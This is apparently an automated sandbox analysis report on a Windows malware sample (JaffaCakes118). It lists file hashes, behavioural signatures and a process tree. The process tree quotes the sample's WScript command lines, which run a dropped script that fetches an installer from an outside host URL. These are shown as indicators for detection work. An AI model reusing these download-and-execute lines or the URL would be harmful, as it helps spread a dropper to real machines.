Analysis
-
max time kernel
117s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
23-05-2024 01:47
Static task
static1
Behavioral task
behavioral1
Sample
695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe
Resource
win10v2004-20240426-en
General
-
Target
695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe
-
Size
184KB
-
MD5
695693f223cc5eb36b6fe1e1af8325ee
-
SHA1
69ecd21dce088e53cf95d69cf5b48e709a5b9790
-
SHA256
583c171af6a7f1876ba4d4000e52b25c9a16741e0243688bd6bf35a2a1a76c7b
-
SHA512
2073ee28601dcc8d8a7e834db1d077a2d69c09fd82d22126b64e4a38ac6da68e9ce270bf549a46e03eb069a8d9195ce069f23ae8590b73ba61d77a3d10db134b
-
SSDEEP
3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3Q:/7BSH8zUB+nGESaaRvoB7FJNndnF
Malware Config
Signatures
-
Blocklisted process makes network request 12 IoCs
Processes:
WScript.exeWScript.exeWScript.exeWScript.exeWScript.exeflow pid process 6 2632 WScript.exe 8 2632 WScript.exe 10 2632 WScript.exe 12 2464 WScript.exe 13 2464 WScript.exe 15 3048 WScript.exe 16 3048 WScript.exe 18 624 WScript.exe 19 624 WScript.exe 22 1040 WScript.exe 23 1040 WScript.exe 27 1040 WScript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exedescription pid process target process PID 1996 wrote to memory of 2632 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe PID 1996 wrote to memory of 2632 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe PID 1996 wrote to memory of 2632 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe PID 1996 wrote to memory of 2632 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe PID 1996 wrote to memory of 2464 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe PID 1996 wrote to memory of 2464 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe PID 1996 wrote to memory of 2464 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe PID 1996 wrote to memory of 2464 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe PID 1996 wrote to memory of 3048 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe PID 1996 wrote to memory of 3048 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe PID 1996 wrote to memory of 3048 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe PID 1996 wrote to memory of 3048 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe PID 1996 wrote to memory of 624 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe PID 1996 wrote to memory of 624 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe PID 1996 wrote to memory of 624 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe PID 1996 wrote to memory of 624 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe PID 1996 wrote to memory of 1040 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe PID 1996 wrote to memory of 1040 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe PID 1996 wrote to memory of 1040 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe PID 1996 wrote to memory of 1040 1996 695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe WScript.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\695693f223cc5eb36b6fe1e1af8325ee_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1996 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2990.js" http://www.djapp.info/?domain=KsqKJTVilf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2990.exe2⤵
- Blocklisted process makes network request
PID:2632 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2990.js" http://www.djapp.info/?domain=KsqKJTVilf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2990.exe2⤵
- Blocklisted process makes network request
PID:2464 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2990.js" http://www.djapp.info/?domain=KsqKJTVilf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2990.exe2⤵
- Blocklisted process makes network request
PID:3048 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2990.js" http://www.djapp.info/?domain=KsqKJTVilf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2990.exe2⤵
- Blocklisted process makes network request
PID:624 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf2990.js" http://www.djapp.info/?domain=KsqKJTVilf.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf2990.exe2⤵
- Blocklisted process makes network request
PID:1040
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD564c143e9f2a438ddf74501d3b3cc54bf
SHA166b41aabcaa5c364d405c858b85fa7a995f53c72
SHA25602802fa86c2539668fb375ddf8b3ffa5a6c7ad8ae0050c3471dc9fca1275c0ca
SHA5129decfe443630833dfc6c4e2b728c0395d0cbd59a5d868639f300244c4c61df6540b21d33497a8dd4e1947aaef02e4cbc815f53acc21d70ba1653d9492f438e96
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize724B
MD58202a1cd02e7d69597995cabbe881a12
SHA18858d9d934b7aa9330ee73de6c476acf19929ff6
SHA25658f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA51297ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD56067cca8309faf9ed39e6356c58c472e
SHA1874a07ed6bc72361d64cbeda41aa0f772c930c25
SHA256b02b76118a9eb3fec429f020bd9c7d3cd7569f02967e6333016af062705d5e9f
SHA51253bb0faeb66e4bc803b01e0f5eef245002dc0b6f5389be6f482e6c75202d79037d6c591118a6179026c5754338e255f93efa2a6ad128fd845ce4802b9005af83
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD57cab410d719951a525144322e267c185
SHA1b3a9c2d09fccd449e9bed2c8ab6ec7ac140979c8
SHA2566df6d3b2e893742431759c0048b206bd030eff77a9eeef9997a3c92de28696e7
SHA5126e00407198af18f91004a7b658da0de808c0d4e5172d339de3049a624ac26e3541dbf28550cfe6eb3afadd30bc314e044d90304189989d7beb8f84024cffbf4c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464
Filesize392B
MD5d961fbad91dd8866f29b23196b20ddf9
SHA19abd5717bae4a780aa78b5db71609c6f0c4ae5c7
SHA2564bb460c97a44a1e18fde9e9d3ea448424a736e8dcd1e35224b6d9fa2547948bd
SHA5126128003548d818dff7651505f57d264344f31ce677cdbaf84ce8a9864c1f9cedfd60fede4aba3f244c39a26865b3f3784ffe38407004404dbe1cfc59bbe5c1c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm
Filesize40KB
MD553b06493bcace1706542960ff5068f4d
SHA1b3e0a61075f50bd64d69cf0a38101ff76db74e55
SHA2569dac85fd13a7a599d354689b2a0a69fe0f94fb5404332d7c913002afb83d6c99
SHA512af9d3d299534b94fd081259d613e975366a1f3ba631a8e40ffc9be29da608c05288641f24a7179529b728d64a4dcef2a7b1c8241d066509518dff514e4ef027a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm
Filesize40KB
MD554aad89f121ef899da3d5f01736e1cd5
SHA18d2252e6460590de6521051fcf8996644d7f8b1d
SHA25685ed9cab179256235addb0ef751afba9f7cf60a3c618811aedc73804c83bbe22
SHA512a11574def12af0ca9e64616d84ef2ab2ebd87aa931370aa63c5d66284bf7e4a2c8645c76e145b5846192aa45d5bbb694dc1e564ebb8ecce5f814bed9c1f24427
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9ZQLLOZN\domain_profile[1].htm
Filesize40KB
MD56ebb1c82afffeb1054fd775ebe382b89
SHA1dedc94db38b4ce4bcf70d5c693e4cec017ef29e8
SHA2567dcf902b22ba136590a7653e7838b60659085d4f705c7e50e0d1accec1bd8e3b
SHA51282c47e1776749f1c606573678771b655735035c87ddd3dc4ef0c2b2f7efd27e92c08fbd6b7d71552edee923e50010b2056c0d5bb94abdf1e0d5ead8d2144833e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\domain_profile[1].htm
Filesize40KB
MD5c9b5ed38be99fcea042811b31bf69f5e
SHA1218ba416c95d59a92de3d804ed38928dfb237ba5
SHA2564166837e1356cee10ee534fe0370ad09e4c82fa995b4cdbc4176ee40ad794562
SHA512068ca79a58b8301e990f386fac0eec09f6b4ec40ef31addaeb9fe4f72e037ac683ada2efd720187e3ec9bf5002a2f700d258e155f748424bdee6ba8b9909a446
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\domain_profile[1].htm
Filesize40KB
MD55c40e853fa75dcd236224450cad92438
SHA165a7161369820282a049ae1102878cc4ac4c1c75
SHA2561b0ece43e1e60dc8665414aa6f5b0d3f2071e3e5f8a5a774c1cdac01225eae7c
SHA5129f948d5a91b3eddb38b8b9d232ccfe7c83a9dbd4c0a8800f411d7e7326beb91524f82dca40b7542152474dc0ed71e30600698c4619d7d1ea99773be5b6389f56
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
3KB
MD53813cab188d1de6f92f8b82c2059991b
SHA14807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA51283b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76
-
Filesize
175B
MD58dc0939aa98dbdac350556a945bb1a88
SHA17991611a6adca383fada3e4e5760b703742bfc0f
SHA256999190107e13bc14f2257d70d82a9397719e1442a73d43619c92ed956e4cbe5d
SHA5129b099f68251873f6ca3d7b88507ffe110d68aeeb08380e5ec916ee99858b8cbc8da2c56633288a432c7dcdfcef01c823ac03de009bd6200684a28d8a97389d1c